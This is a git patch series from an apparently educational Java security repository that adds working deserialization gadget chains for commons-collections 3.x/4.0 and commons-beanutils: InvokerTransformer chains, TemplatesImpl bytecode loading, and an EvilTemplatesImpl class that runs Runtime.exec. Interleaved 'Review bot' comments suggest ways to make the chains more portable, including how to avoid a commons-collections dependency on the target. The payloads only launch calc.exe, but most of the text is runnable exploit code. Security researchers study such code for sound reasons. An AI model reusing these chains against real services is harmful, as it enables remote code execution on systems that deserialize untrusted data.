b/general/src/main/java/com/govuln/bytes/HelloBCEL.java 
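Review bot: Nothing in the new file records why it is tied to commons-collections4 4.0 specifically, even though general/pom.xml in this patch pins exactly that version. As far as I know 4.1 stopped making InvokerTransformer and friends deserializable by default, so this chain fails on later 4.x releases; a header comment such as `// requires commons-collections4 4.0: from 4.1 on the functors are no longer deserializable by default` would save the next reader the search. The fake-to-real transformer swap (`f.set(transformerChain, transformers)` after `expMap.put` and `outerMap.remove`) needs the same explanation as in the 3.x CommonsCollections6 and is equally uncommented here. The local-trigger `ObjectInputStream` is never closed; `try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()))) { ois.readObject(); }` takes care of that.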
@@ -3,7 +3,7 @@ import com.sun.org.apache.bcel.internal.classfile.JavaClass; import com.sun.org.apache.bcel.internal.classfile.Utility; import com.sun.org.apache.bcel.internal.Repository; -import com.sun.org.apache.bcel.internal.util.ClassLoader; +// import com.sun.org.apache.bcel.internal.util.ClassLoader; public class HelloBCEL { public static void main(String []args) throws Exception { 
@@ -18,6 +18,6 @@ protected static void encode() throws Exception { } protected static void decode() throws Exception { - new ClassLoader().loadClass("$$BCEL$$$l$8b$I$A$A$A$A$A$A$AmP$cbN$CA$Q$ac$91$c7$$$cb$w$I$e2$fby0$B$P$ee$c5$h$c4$8b$89$f1$b0Q$T$M$9e$87e$82C$86$j$b3$M$q$7e$96$k4$f1$e0$H$f8Q$c6$9e$91$f8H$ecCW$ba$aa$ba$d23$ef$l$afo$AN$b0$X$a0$88$e5$Sj$a8$fbX$J$d0$c0$aa$875$P$eb$M$c5$8eL$a59e$c85$5b$3d$86$fc$99$k$I$86J$ySq9$j$f7Ev$c3$fb$8a$98Z$ac$T$aez$3c$93v$9e$93ys$t$t$Ma$yfRE$XB$v$ddf$f0$3b$89$9a$87$G$5d$3d$cd$Sq$$$ad$3bp$86$e3$R$9f$f1$Q$k$7c$P$h$n6$b1$c5Pv$ca$fe$ad$ce$d4$c0$c3v$88$j$ec$92$ff$t$95$a1j$d7$o$c5$d3at$d5$l$89$c4$fc$a1$ba$P$T$p$c6$f4$I$3d$r$a1$R$3bE$ea$e8$3a$93$a9$e9$9aL$f01$jV$ff$87f$f0$ee$ed$a4R$dak$c6$bf$o$N$d1$c3v$ab$87$D$U$e8$fbl$z$80$d9$c3$a9$97h$8a$I$Za$e1$e8$F$ec$d1$c9$B$f5$a2$ps$uS$P$bf$M$84$8b$84$3e$96$be$97$P$c9m$ab$f4$84$85Z$ee$Zy$h$c0$5c$40$e0$a4$CYmT$c5$FW$3f$B$dc$ab$c0$7f$cc$B$A$A").newInstance(); + // new ClassLoader().loadClass("$$BCEL$$$l$8b$I$A$A$A$A$A$A$AmP$cbN$CA$Q$ac$91$c7$$$cb$w$I$e2$fby0$B$P$ee$c5$h$c4$8b$89$f1$b0Q$T$M$9e$87e$82C$86$j$b3$M$q$7e$96$k4$f1$e0$H$f8Q$c6$9e$91$f8H$ecCW$ba$aa$ba$d23$ef$l$afo$AN$b0$X$a0$88$e5$Sj$a8$fbX$J$d0$c0$aa$875$P$eb$M$c5$8eL$a59e$c85$5b$3d$86$fc$99$k$I$86J$ySq9$j$f7Ev$c3$fb$8a$98Z$ac$T$aez$3c$93v$9e$93ys$t$t$Ma$yfRE$XB$v$ddf$f0$3b$89$9a$87$G$5d$3d$cd$Sq$$$ad$3bp$86$e3$R$9f$f1$Q$k$7c$P$h$n6$b1$c5Pv$ca$fe$ad$ce$d4$c0$c3v$88$j$ec$92$ff$t$95$a1j$d7$o$c5$d3at$d5$l$89$c4$fc$a1$ba$P$T$p$c6$f4$I$3d$r$a1$R$3bE$ea$e8$3a$93$a9$e9$9aL$f01$jV$ff$87f$f0$ee$ed$a4R$dak$c6$bf$o$N$d1$c3v$ab$87$D$U$e8$fbl$z$80$d9$c3$a9$97h$8a$I$Za$e1$e8$F$ec$d1$c9$B$f5$a2$ps$uS$P$bf$M$84$8b$84$3e$96$be$97$P$c9m$ab$f4$84$85Z$ee$Zy$h$c0$5c$40$e0$a4$CYmT$c5$FW$3f$B$dc$ab$c0$7f$cc$B$A$A").newInstance(); } } diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections1.java b/general/src/main/java/com/govuln/deserialization/CommonsCollections1.java new file mode 100644 index 0000000..c37d5af --- /dev/null 
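Review bot: Both HelloBCEL hunks replace code with commented-out code (`// import ...util.ClassLoader;` above and the `// new ClassLoader().loadClass(...)` here) without saying why, which leaves decode() as an empty method with a very long comment line. The motivation is presumably that `com.sun.org.apache.bcel.internal.util.ClassLoader` is no longer present on newer JDK builds (the README entry "BCEL ClassLoader去哪了" in this repo points at that), and a comment in decode() such as `// BCEL's util.ClassLoader is absent on newer JDKs; kept as a reference to the old API only` would record it. If the call is meant to stay runnable on old JDKs, moving the `$$BCEL$$` string into a `private static final String` and keeping only the call commented would make that intent clearer than burying it in one comment line.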
+++ b/general/src/main/java/com/govuln/deserialization/CommonsCollections1.java 
@@ -0,0 +1,51 @@ +package com.govuln.deserialization; + +import org.apache.commons.collections.Transformer; +import org.apache.commons.collections.functors.ChainedTransformer; +import org.apache.commons.collections.functors.ConstantTransformer; +import org.apache.commons.collections.functors.InvokerTransformer; +import org.apache.commons.collections.map.TransformedMap; + +import java.io.ByteArrayInputStream; +import java.io.ByteArrayOutputStream; +import java.io.ObjectInputStream; +import java.io.ObjectOutputStream; +import java.lang.annotation.Retention; +import java.lang.reflect.Constructor; +import java.lang.reflect.InvocationHandler; +import java.util.HashMap; +import java.util.Map; + +class CommonsCollections1 { + public static void main(String[] args) throws Exception { + Transformer[] transformers = new Transformer[] { + new ConstantTransformer(Runtime.class), + new InvokerTransformer("getMethod", new Class[] { String.class, + Class[].class }, new Object[] { "getRuntime", + new Class[0] }), + new InvokerTransformer("invoke", new Class[] { Object.class, + Object[].class }, new Object[] { null, new Object[0] }), + new InvokerTransformer("exec", new Class[] { String.class }, + new String[] { "calc.exe" }), + }; + + Transformer transformerChain = new ChainedTransformer(transformers); + Map innerMap = new HashMap(); + innerMap.put("value", "xxxx"); + Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain); + + Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler"); + Constructor construct = clazz.getDeclaredConstructor(Class.class, Map.class); + construct.setAccessible(true); + InvocationHandler handler = (InvocationHandler) construct.newInstance(Retention.class, outerMap); + + ByteArrayOutputStream barr = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(barr); + oos.writeObject(handler); + oos.close(); + + System.out.println(barr); + ObjectInputStream ois = new ObjectInputStream(new 
ByteArrayInputStream(barr.toByteArray())); + Object o = (Object)ois.readObject(); + } +} diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections1For4.java b/general/src/main/java/com/govuln/deserialization/CommonsCollections1For4.java new file mode 100644 index 0000000..d7e0070 --- /dev/null +++ b/general/src/main/java/com/govuln/deserialization/CommonsCollections1For4.java 
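Review bot: `class CommonsCollections1` is package-private while every sibling gadget class in this patch is declared `public class` (CommonsCollections1For4, CommonsCollections2, CommonsCollections3For4); `public class CommonsCollections1 {` keeps them consistent and launchable the same way. The chain also depends on `sun.reflect.annotation.AnnotationInvocationHandler.readObject` writing back through the decorated map, and as far as I recall that write-back was removed in JDK 8u71, so on a current JDK this `main` will deserialize without firing anything; a header comment such as `// only triggers on JDK < 8u71, where AnnotationInvocationHandler.readObject calls setValue() on the map entries` would prevent a confusing debugging session. Neither stream is closed on the error path, and `ois` not at all; try-with-resources around both would fix that.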
@@ -0,0 +1,51 @@ +package com.govuln.deserialization; + +import org.apache.commons.collections4.Transformer; +import org.apache.commons.collections4.functors.ChainedTransformer; +import org.apache.commons.collections4.functors.ConstantTransformer; +import org.apache.commons.collections4.functors.InvokerTransformer; +import org.apache.commons.collections4.map.TransformedMap; + +import java.io.ByteArrayInputStream; +import java.io.ByteArrayOutputStream; +import java.io.ObjectInputStream; +import java.io.ObjectOutputStream; +import java.lang.annotation.Retention; +import java.lang.reflect.Constructor; +import java.lang.reflect.InvocationHandler; +import java.util.HashMap; +import java.util.Map; + +public class CommonsCollections1For4 { + public static void main(String[] args) throws Exception { + Transformer[] transformers = new Transformer[] { + new ConstantTransformer(Runtime.class), + new InvokerTransformer("getMethod", new Class[] { String.class, + Class[].class }, new Object[] { "getRuntime", + new Class[0] }), + new InvokerTransformer("invoke", new Class[] { Object.class, + Object[].class }, new Object[] { null, new Object[0] }), + new InvokerTransformer("exec", new Class[] { String.class }, + new String[] { "calc.exe" }), + }; + + Transformer transformerChain = new ChainedTransformer(transformers); + Map innerMap = new HashMap(); + innerMap.put("value", "xxxx"); + Map outerMap = TransformedMap.transformedMap(innerMap, null, transformerChain); + + Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler"); + Constructor construct = clazz.getDeclaredConstructor(Class.class, Map.class); + construct.setAccessible(true); + InvocationHandler handler = (InvocationHandler) construct.newInstance(Retention.class, outerMap); + + ByteArrayOutputStream barr = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(barr); + oos.writeObject(handler); + oos.close(); + + System.out.println(barr); + ObjectInputStream ois = new 
ObjectInputStream(new ByteArrayInputStream(barr.toByteArray())); + Object o = (Object)ois.readObject(); + } +} diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections2.java b/general/src/main/java/com/govuln/deserialization/CommonsCollections2.java new file mode 100644 index 0000000..0b8df6a --- /dev/null +++ b/general/src/main/java/com/govuln/deserialization/CommonsCollections2.java 
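Review bot: Both streams are only closed on the happy path and `ois` is never closed; try-with-resources covers both: `try (ObjectOutputStream oos = new ObjectOutputStream(barr)) { oos.writeObject(handler); }` and `try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()))) { ois.readObject(); }`. The cast in `Object o = (Object) ois.readObject();` is a no-op and `o` is unused, so a bare `ois.readObject();` reads more honestly as a side-effect call. This file shares the AnnotationInvocationHandler-based trigger with the 3.x CommonsCollections1 and therefore, as far as I know, the same JDK version dependency, which no comment mentions.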
@@ -0,0 +1,55 @@ +package com.govuln.deserialization; + +import java.io.ByteArrayInputStream; +import java.io.ByteArrayOutputStream; +import java.io.ObjectInputStream; +import java.io.ObjectOutputStream; +import java.lang.reflect.Field; +import java.util.Comparator; +import java.util.PriorityQueue; + +import org.apache.commons.collections4.Transformer; +import org.apache.commons.collections4.functors.ChainedTransformer; +import org.apache.commons.collections4.functors.ConstantTransformer; +import org.apache.commons.collections4.functors.InvokerTransformer; +import org.apache.commons.collections4.comparators.TransformingComparator; + +public class CommonsCollections2 { + public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { + Field field = obj.getClass().getDeclaredField(fieldName); + field.setAccessible(true); + field.set(obj, value); + } + + public static void main(String[] args) throws Exception { + Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)}; + Transformer[] transformers = new Transformer[] { + new ConstantTransformer(Runtime.class), + new InvokerTransformer("getMethod", new Class[] { String.class, + Class[].class }, new Object[] { "getRuntime", + new Class[0] }), + new InvokerTransformer("invoke", new Class[] { Object.class, + Object[].class }, new Object[] { null, new Object[0] }), + new InvokerTransformer("exec", new Class[] { String.class }, + new String[] { "calc.exe" }), + }; + Transformer transformerChain = new ChainedTransformer(fakeTransformers); + + Comparator comparator = new TransformingComparator(transformerChain); + + final PriorityQueue queue = new PriorityQueue(2, comparator); + queue.add(1); + queue.add(2); + + setFieldValue(transformerChain, "iTransformers", transformers); + + ByteArrayOutputStream barr = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(barr); + oos.writeObject(queue); + oos.close(); + + System.out.println(barr); + 
ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray())); + Object o = (Object)ois.readObject(); + } +} diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections3For4.java b/general/src/main/java/com/govuln/deserialization/CommonsCollections3For4.java new file mode 100644 index 0000000..aecb359 --- /dev/null +++ b/general/src/main/java/com/govuln/deserialization/CommonsCollections3For4.java 
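Review bot: The reason the queue is filled while the harmless `fakeTransformers` chain is installed and only afterwards `setFieldValue(transformerChain, "iTransformers", transformers)` is applied is not explained anywhere in the file. Presumably `queue.add(2)` already invokes the comparator, so the real chain would run the command on the generating host, while on the target `PriorityQueue.readObject` rebuilds the heap and invokes it again; a comment above the two `add` calls such as `// add() goes through the comparator, so keep the harmless chain installed until the queue is built; PriorityQueue.readObject re-sorts and runs the real chain on the target` would make that clear. The raw `PriorityQueue`/`Comparator` types are common in these PoCs, but `PriorityQueue<Object>` and `Comparator<Object>` would remove the unchecked warnings at no cost.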
@@ -0,0 +1,72 @@ +package com.govuln.deserialization; + +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter; +import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import org.apache.commons.collections4.Transformer; +import org.apache.commons.collections4.functors.ChainedTransformer; +import org.apache.commons.collections4.functors.ConstantTransformer; +import org.apache.commons.collections4.functors.InstantiateTransformer; +import org.apache.commons.collections4.map.TransformedMap; + +import javax.xml.transform.Templates; +import java.io.ByteArrayInputStream; +import java.io.ByteArrayOutputStream; +import java.io.ObjectInputStream; +import java.io.ObjectOutputStream; +import java.lang.annotation.Retention; +import java.lang.reflect.Constructor; +import java.lang.reflect.Field; +import java.lang.reflect.InvocationHandler; +import java.util.Base64; +import java.util.HashMap; +import java.util.Map; + +public class CommonsCollections3For4 { + public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { + Field field = obj.getClass().getDeclaredField(fieldName); + field.setAccessible(true); + field.set(obj, value); + } + + public static void main(String[] args) throws Exception { + // source: bytecodes/HelloTemplateImpl.java + byte[] code = Base64.getDecoder().decode("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"); + TemplatesImpl obj = new TemplatesImpl(); + setFieldValue(obj, "_bytecodes", new byte[][]{code}); + setFieldValue(obj, "_name", "HelloTemplatesImpl"); + setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); + + Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)}; + Transformer[] transformers = new Transformer[]{ + new ConstantTransformer(TrAXFilter.class), + new InstantiateTransformer( + new Class[] { Templates.class }, + new Object[] { obj }) + }; + + Transformer 
transformerChain = new ChainedTransformer(fakeTransformers); + + Map innerMap = new HashMap(); + innerMap.put("value", "xxxx"); + Map outerMap = TransformedMap.transformedMap(innerMap, null, transformerChain); + + Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler"); + Constructor construct = clazz.getDeclaredConstructor(Class.class, Map.class); + construct.setAccessible(true); + InvocationHandler handler = (InvocationHandler) construct.newInstance(Retention.class, outerMap); + + setFieldValue(transformerChain, "iTransformers", transformers); + // ================== + // 生成序列化字符串 + ByteArrayOutputStream barr = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(barr); + oos.writeObject(handler); + oos.close(); + + // 本地测试触发 + // System.out.println(barr); + ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray())); + Object o = (Object) ois.readObject(); + } +} From dc6d3a4cc53ded6e112ac49aa0dea0a9ac6208a5 Mon Sep 17 00:00:00 2001 From: phith0n Date: Sun, 28 Mar 2021 03:48:57 +0800 Subject: [PATCH 20/35] add CommonsCollections2TemplatesImpl --- .../deserialization/CommonsCollections2.java | 2 +- .../CommonsCollections2TemplatesImpl.java | 55 +++++++++++++++++++ .../src/main/java/evil/EvilTemplatesImpl.java | 19 +++++++ 3 files changed, 75 insertions(+), 1 deletion(-) create mode 100644 general/src/main/java/com/govuln/deserialization/CommonsCollections2TemplatesImpl.java create mode 100644 general/src/main/java/evil/EvilTemplatesImpl.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections2.java b/general/src/main/java/com/govuln/deserialization/CommonsCollections2.java index 0b8df6a..c6dd2e0 100644 --- a/general/src/main/java/com/govuln/deserialization/CommonsCollections2.java +++ b/general/src/main/java/com/govuln/deserialization/CommonsCollections2.java 
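Review bot: Unlike CommonsCollections6For4, nothing in this `main` appears to read through `outerMap` before serialization (the put goes to `innerMap` before `TransformedMap.transformedMap` wraps it, and the AnnotationInvocationHandler constructor only stores the map), so the `fakeTransformers` indirection and the late `setFieldValue(transformerChain, "iTransformers", transformers)` seem to buy nothing here; if they are kept for symmetry with the other chains a comment should say so, otherwise build the chain with `transformers` directly. The leftover `// System.out.println(barr);` is commented-out code and should go. The TransformedMap/AnnotationInvocationHandler trigger carries, as far as I know, the same JDK version dependency as CommonsCollections1 and is equally uncommented, and `ois` is never closed.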
@@ -37,7 +37,7 @@ public static void main(String[] args) throws Exception { Comparator comparator = new TransformingComparator(transformerChain); - final PriorityQueue queue = new PriorityQueue(2, comparator); + PriorityQueue queue = new PriorityQueue(2, comparator); queue.add(1); queue.add(2); diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections2TemplatesImpl.java b/general/src/main/java/com/govuln/deserialization/CommonsCollections2TemplatesImpl.java new file mode 100644 index 0000000..e3bbe2b --- /dev/null +++ b/general/src/main/java/com/govuln/deserialization/CommonsCollections2TemplatesImpl.java 
@@ -0,0 +1,55 @@ +package com.govuln.deserialization; + +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import javassist.ClassPool; +import javassist.CtClass; +import org.apache.commons.collections4.Transformer; +import org.apache.commons.collections4.comparators.TransformingComparator; +import org.apache.commons.collections4.functors.InvokerTransformer; + +import java.io.ByteArrayInputStream; +import java.io.ByteArrayOutputStream; +import java.io.ObjectInputStream; +import java.io.ObjectOutputStream; +import java.lang.reflect.Field; +import java.util.Comparator; +import java.util.PriorityQueue; + +public class CommonsCollections2TemplatesImpl { + public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { + Field field = obj.getClass().getDeclaredField(fieldName); + field.setAccessible(true); + field.set(obj, value); + } + + protected static byte[] getBytescode() throws Exception { + ClassPool pool = ClassPool.getDefault(); + CtClass clazz = pool.get(evil.EvilTemplatesImpl.class.getName()); + return clazz.toBytecode(); + } + + public static void main(String[] args) throws Exception { + TemplatesImpl obj = new TemplatesImpl(); + setFieldValue(obj, "_bytecodes", new byte[][]{getBytescode()}); + setFieldValue(obj, "_name", "HelloTemplatesImpl"); + setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); + + Transformer transformer = new InvokerTransformer("toString", null, null); + Comparator comparator = new TransformingComparator(transformer); + PriorityQueue queue = new PriorityQueue(2, comparator); + queue.add(obj); + queue.add(obj); + + setFieldValue(transformer, "iMethodName", "newTransformer"); + + ByteArrayOutputStream barr = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(barr); + oos.writeObject(queue); + oos.close(); + + System.out.println(barr); + ObjectInputStream ois = new 
ObjectInputStream(new ByteArrayInputStream(barr.toByteArray())); + Object o = (Object)ois.readObject(); + } +} diff --git a/general/src/main/java/evil/EvilTemplatesImpl.java b/general/src/main/java/evil/EvilTemplatesImpl.java new file mode 100644 index 0000000..d02989e --- /dev/null +++ b/general/src/main/java/evil/EvilTemplatesImpl.java @@ -0,0 +1,19 @@ +package evil; + +import com.sun.org.apache.xalan.internal.xsltc.DOM; +import com.sun.org.apache.xalan.internal.xsltc.TransletException; +import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; +import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; +import com.sun.org.apache.xml.internal.serializer.SerializationHandler; + +public class EvilTemplatesImpl extends AbstractTranslet { + public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {} + + public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {} + + public EvilTemplatesImpl() throws Exception { + super(); + System.out.println("Hello TemplatesImpl"); + Runtime.getRuntime().exec("calc.exe"); + } +} From 883306d44dbe4f14db5976f25732796d07a78fa2 Mon Sep 17 00:00:00 2001 From: phith0n Date: Fri, 2 Apr 2021 02:55:19 +0800 Subject: [PATCH 21/35] add CommonsBeanutils1 --- general/pom.xml | 5 ++ .../src/main/java/com/govuln/beans/Cat.java | 20 +++++++ .../deserialization/CommonsBeanutils1.java | 53 +++++++++++++++++++ 3 files changed, 78 insertions(+) create mode 100644 general/src/main/java/com/govuln/beans/Cat.java create mode 100644 general/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java diff --git a/general/pom.xml b/general/pom.xml index afac8b0..8ad9f54 100644 --- a/general/pom.xml +++ b/general/pom.xml @@ -31,6 +31,11 @@ commons-collections4 4.0 + + commons-beanutils + commons-beanutils + 1.9.4 + javassist 
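Review bot: `System.out.println(barr)` in the new `main` prints the serialized stream through `ByteArrayOutputStream.toString()`, which decodes the bytes with the platform charset, so what appears on stdout is a lossy rendering rather than a copy of the payload that the following `readObject()` consumes; print `Base64.getEncoder().encodeToString(barr.toByteArray())` instead (the module appears to still compile for 1.8 at this commit, judging by the later pom change). The `ObjectInputStream` is also never closed; `try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()))) { ois.readObject(); }` keeps the local trigger and releases the stream. It would be worth a one-line comment above the trigger noting that `readObject()` here runs the `EvilTemplatesImpl` constructor on the generating host.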
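Review bot: Nothing in `EvilTemplatesImpl` says why the payload sits in the constructor or why the two `transform` overrides are empty, which is the one thing a reader of this class needs. I would add above the class: `// Instantiated by TemplatesImpl.newTransformer() (see the _bytecodes/_name/_tfactory setup in the gadget files); the no-arg constructor is therefore the execution point, and the empty transform() overrides only satisfy AbstractTranslet.` The `Runtime.getRuntime().exec("calc.exe")` call is Windows-only, so the demo fails silently with an `IOException` elsewhere; branching on `System.getProperty("os.name")` or reading the command from a system property would make the chain testable on any platform.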
diff --git a/general/src/main/java/com/govuln/beans/Cat.java b/general/src/main/java/com/govuln/beans/Cat.java new file mode 100644 index 0000000..157372e --- /dev/null +++ b/general/src/main/java/com/govuln/beans/Cat.java @@ -0,0 +1,20 @@ +package com.govuln.beans; + +import org.apache.commons.beanutils.PropertyUtils; + +final public class Cat { + private String name = "catalina"; + + public String getName() { + return name; + } + + public void setName(String name) { + this.name = name; + } + + public static void main(String []args) throws Exception { + Cat cat = new Cat(); + System.out.println(PropertyUtils.getProperty(cat, "name")); + } +} diff --git a/general/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java b/general/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java new file mode 100644 index 0000000..1901132 --- /dev/null +++ b/general/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java 
@@ -0,0 +1,53 @@
+package com.govuln.deserialization;
+
+import java.io.ByteArrayInputStream;
+import java.io.ByteArrayOutputStream;
+import java.io.ObjectInputStream;
+import java.io.ObjectOutputStream;
+import java.lang.reflect.Field;
+import java.util.PriorityQueue;
+
+import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
+import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
+import javassist.ClassPool;
+import javassist.CtClass;
+import org.apache.commons.beanutils.BeanComparator;
+
+public class CommonsBeanutils1 {
+ public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
+ Field field = obj.getClass().getDeclaredField(fieldName);
+ field.setAccessible(true);
+ field.set(obj, value);
+ }
+
+ protected static byte[] getBytescode() throws Exception {
+ ClassPool pool = ClassPool.getDefault();
+ CtClass clazz = pool.get(evil.EvilTemplatesImpl.class.getName());
+ return clazz.toBytecode();
+ }
+
+ public static void main(String[] args) throws Exception {
+ TemplatesImpl obj = new TemplatesImpl();
+ setFieldValue(obj, "_bytecodes", new byte[][]{getBytescode()});
+ setFieldValue(obj, "_name", "HelloTemplatesImpl");
+ setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
+
+ final BeanComparator comparator = new BeanComparator();
+ final PriorityQueue queue = new PriorityQueue(2, comparator);
+ // stub data for replacement later
+ queue.add(1);
+ queue.add(1);
+
+ setFieldValue(comparator, "property", "outputProperties");
+ setFieldValue(queue, "queue", new Object[]{obj, obj});
+
+ ByteArrayOutputStream barr = new ByteArrayOutputStream();
+ ObjectOutputStream oos = new ObjectOutputStream(barr);
+ oos.writeObject(queue);
+ oos.close();
+
+ System.out.println(barr);
+ ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
+ Object o = (Object)ois.readObject();
+ }
+} From 89b089ab6f0ae23d7a051654e68038d618ce5ff5 Mon Sep 17 00:00:00 2001
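Review bot: `new BeanComparator()` with no arguments leaves the comparator's internal `comparator` field at its default, which, as far as I recall the 1.9.x source, is `ComparableComparator` from commons-collections; that class is then serialized inside the `PriorityQueue` and the chain silently keeps a commons-collections dependency on the target, which is the very thing a commons-beanutils-only gadget is meant to avoid. The Shiro variant added later in this series passes `String.CASE_INSENSITIVE_ORDER` for exactly this reason, and the same constructor works here: `final BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);` with `queue.add("1")` stubs instead of `queue.add(1)`. If the dependency is intentional for this general-module demo, a comment saying so next to the constructor would stop the next reader from copying it into a commons-collections-free target.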
From: phith0n Date: Fri, 2 Apr 2021 02:57:03 +0800 Subject: [PATCH 22/35] upgrade manual --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 68b7e40..a4a3704 100644 --- a/README.md +++ b/README.md @@ -39,6 +39,7 @@ - 我简化的[CommonsCollections3](general/src/main/java/com/govuln/deserialization/CommonsCollections3.java) - CommonsCollections6一次执行多个命令:[CommonsCollections6Multiple](general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java) - 支持commons-collections4.0版本的CommonsCollections6利用链:[CommonsCollections6For4](general/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java) +- 我简化的CommonsBeanutils1利用链:[CommonsBeanutils1](https://github.com/phith0n/JavaThings/blob/master/general/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java) Shiro反序列化: From 16100a4514fc7cd0da77076d2232c2d120c59eaf Mon Sep 17 00:00:00 2001 From: phith0n Date: Fri, 2 Apr 2021 23:44:50 +0800 Subject: [PATCH 23/35] add 16 chapter --- README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index a4a3704..4550056 100644 --- a/README.md +++ b/README.md @@ -19,7 +19,8 @@ - [Java安全漫谈 - 番外篇1. BCEL ClassLoader去哪了?](https://www.leavesongs.com/PENETRATION/where-is-bcel-classloader.html) - [Java安全漫谈 - 13.Java中动态加载字节码的那些方法](https://t.zsxq.com/E2VfUVB) - [Java安全漫谈 - 14.为什么需要CommonsCollections3](https://t.zsxq.com/i6Y7QN7) -- [ Java安全漫谈 - 15.TemplatesImpl在Shiro中的利用](https://t.zsxq.com/JAUBmMz) +- [Java安全漫谈 - 15.TemplatesImpl在Shiro中的利用](https://t.zsxq.com/JAUBmMz) +- [Java安全漫谈 - 16.commons-collections4与漏洞修复](https://t.zsxq.com/ZBQj2FE) ## Demo代码 From 49cb1bbfd48d2f2bcba53cacc70dfde2c8b0c21d Mon Sep 17 00:00:00 2001 
From: phith0n Date: Sat, 3 Apr 2021 05:42:10 +0800 Subject: [PATCH 24/35] improve --- .../deserialization/CommonsBeanutils1.java | 11 ++--- .../deserialization/CommonsCollections3.java | 8 ++-- .../CommonsCollections3For4.java | 9 ++-- .../java/com/govuln/shiroattack/Client1.java | 20 +++++++++ .../shiroattack/CommonsBeanutils1Shiro.java | 43 +++++++++++++++++++ 5 files changed, 76 insertions(+), 15 deletions(-) create mode 100644 shiroattack/src/main/java/com/govuln/shiroattack/Client1.java create mode 100644 shiroattack/src/main/java/com/govuln/shiroattack/CommonsBeanutils1Shiro.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java b/general/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java index 1901132..5c51107 100644 --- a/general/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java +++ b/general/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java @@ -10,7 +10,6 @@ import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; import javassist.ClassPool; -import javassist.CtClass; import org.apache.commons.beanutils.BeanComparator; public class CommonsBeanutils1 { @@ -20,15 +19,11 @@ public static void setFieldValue(Object obj, String fieldName, Object value) thr field.set(obj, value); } - protected static byte[] getBytescode() throws Exception { - ClassPool pool = ClassPool.getDefault(); - CtClass clazz = pool.get(evil.EvilTemplatesImpl.class.getName()); - return clazz.toBytecode(); - } - public static void main(String[] args) throws Exception { TemplatesImpl obj = new TemplatesImpl(); - setFieldValue(obj, "_bytecodes", new byte[][]{getBytescode()}); + setFieldValue(obj, "_bytecodes", new byte[][]{ + ClassPool.getDefault().get(evil.EvilTemplatesImpl.class.getName()).toBytecode() + }); setFieldValue(obj, "_name", "HelloTemplatesImpl"); setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); 
